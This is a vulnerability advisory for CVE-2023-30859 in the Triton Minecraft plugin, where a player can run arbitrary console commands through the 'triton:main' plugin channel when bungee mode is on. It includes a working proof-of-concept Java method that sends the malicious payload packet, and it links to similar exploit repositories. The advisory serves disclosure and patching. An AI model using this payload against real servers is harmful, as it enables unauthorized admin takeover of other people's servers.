Headline
CVE-2023-30859: Arbitrary command execution on Spigot console by malicious player
Triton is a Minecraft plugin for Spigot and BungeeCord that helps you translate your Minecraft server. The CustomPayload packet allows you to execute commands on the spigot/bukkit console. When you enable bungee mode in the config it will enable the bungee bridge and the server will begin to broadcast the ‘triton:main’ plugin channel. Using this plugin channel you are able to send a payload packet containing a byte (2) and a string (any spigot command). This could be used to make yourself a server operator and be used to extract other user information through phishing (pretending to be an admin), many servers use essentials so the /geoip command could be available to them, etc. This could also be modified to allow you to set the servers language, set another players language, etc. This issue affects those who have bungee enabled in config. This issue has been fixed in version 3.8.4.
Summary
A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.
Details
When you enable bungeecord mode in the config, the plugin will enable the proxy bridge, and the server will begin to broadcast the triton:main plugin channel.
This channel is used by Triton for communication between the proxy and the server (and vice-versa), and allows to, among other actions, to tell the server to execute any command as the console.
Triton did not filter incoming plugin messaging packets from Players, so a modded client could send a package that would allow them to execute any command they wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for Privilege Escalation in the Minecraft server, and perhaps even an RCE in the machine itself.
Using this plugin channel, the malicious player is able to send a payload packet containing a byte (2) and a string (any Spigot command).
Other payloads could also be sent, which could mess with the server’s translations, for instance, but those are less powerful than the above payload.
Proof of Concept
Demonstration video:
POC Video
Demonstration code:
// This is for version 1.8, for later versions the code will change slightly private void triton(String command) { try { ByteArrayOutputStream b = new ByteArrayOutputStream(); DataOutputStream out = new DataOutputStream(b); out.writeByte(2); // Sub Channel ID out.writeUTF(command); // Command PacketBuffer buffer = (new PacketBuffer(Unpooled.buffer())); buffer.writeBytes(b.toByteArray()); mc.thePlayer.sendQueue.addToSendQueue(new C17PacketCustomPayload("triton:main", buffer)); } catch(Exception e) { e.printStackTrace(); } }
This is also a similar exploit to these:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit
Impact
This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have bungeecord set to true on Triton’s config.yml, no matter if they are behind BungeeCord or Velocity or not.